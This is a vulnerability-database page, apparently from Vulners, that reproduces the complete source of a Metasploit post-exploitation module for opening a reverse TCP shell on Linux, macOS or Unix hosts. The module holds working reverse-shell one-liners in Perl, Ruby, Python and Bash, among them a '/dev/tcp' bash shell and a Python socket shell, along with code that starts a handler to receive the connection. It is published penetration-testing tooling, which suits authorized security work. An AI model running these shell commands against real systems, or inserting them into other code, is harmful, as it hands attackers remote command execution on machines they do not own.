Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multi Manage System Remote TCP Shell Session

🗓️ 18 Oct 2011 23:31:04Reported by Carlos Perez <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 38 Views

Create Reverse TCP Shell on the Target System using Installed Scripting Environment

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Manage System Remote TCP Shell Session',
        'Description' => %q{
          This module will create a Reverse TCP Shell on the target system
          using the system's own scripting environments installed on the
          target.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => %w[linux osx unix],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )
    register_options(
      [
        OptAddressLocal.new('LHOST',
                            [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT',
                   [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),
        OptEnum.new('TYPE', [
          true, 'Scripting environment on target to use for reverse shell',
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']
        ])
      ]
    )
  end

  # Run Method for when run command is issued
  def run
    create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']
    lhost = datastore['LHOST']
    lport = datastore['LPORT']
    cmd = ''

    begin
      case datastore['TYPE']
      when /auto/i
        cmd = auto_create_session(lhost, lport)
      when /ruby/i
        cmd = ruby_session(lhost, lport)
      when /python/i
        cmd = python_session(lhost, lport)
      when /perl/i
        cmd = perl_session(lhost, lport)
      when /bash/i
        cmd = bash_session(lhost, lport)
      end
    rescue StandardError
    end

    if !cmd.empty?
      print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
      cmd_exec("(#{cmd} &)")
    end
  end

  # Runs a reverse tcp shell with the scripting environment found
  def auto_create_session(lhost, lport)
    cmd = ''

    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl was found on target')
      cmd = perl_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby was found on target')
      cmd = ruby_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python was found on target')
      cmd = python_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash was found on target')
      cmd = bash_session(lhost, lport)
      vprint_status("Running #{cmd}")
    else
      print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')
    end

    return cmd
  end

  # Method for checking if a listner for a given IP and port is present
  # will return true if a conflict exists and false if none is found
  def check_for_listner(lhost, lport)
    conflict = false
    client.framework.jobs.each do |_k, j|
      next unless j.name =~ %r{ multi/handler}

      current_id = j.jid
      current_lhost = j.ctx[0].datastore['LHOST']
      current_lport = j.ctx[0].datastore['LPORT']
      if (lhost == current_lhost) && (lport == current_lport.to_i)
        print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
        conflict = true
      end
    end
    return conflict
  end

  # Starts a exploit/multi/handler session
  def create_multihand(lhost, lport)
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    print_status('Starting exploit/multi/handler')
    if !check_for_listner(lhost, lport)
      # Set options for module
      mul = client.framework.exploits.create('multi/handler')
      mul.share_datastore(pay.datastore)
      mul.datastore['WORKSPACE'] = client.workspace
      mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
      mul.datastore['EXITFUNC'] = 'thread'
      mul.datastore['ExitOnSession'] = false
      # Validate module options
      mul.options.validate(mul.datastore)
      # Execute showing output
      mul.exploit_simple(
        'Payload' => mul.datastore['PAYLOAD'],
        'LocalInput' => user_input,
        'LocalOutput' => user_output,
        'RunAsJob' => true
      )
    else
      print_error('Could not start handler!')
      print_error('A job is listening on the same Port')
    end
  end

  # Perl reverse TCP Shell
  def perl_session(lhost, lport)
    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl reverse shell selected')
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \
            "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Ruby reverse TCP Shell
  def ruby_session(lhost, lport)
    if cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby reverse shell selected')
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \
             "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Python reverse TCP Shell
  def python_session(lhost, lport)
    if cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python reverse shell selected')
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
             "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \
             "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Bash reverse TCP Shell
  def bash_session(lhost, lport)
    if cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash reverse shell selected')
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2023 13:47Current
6.9Medium risk
Vulners AI Score6.9
metasploitremote shellsystem managementreverse tcpscripting environmentsnetwork security
38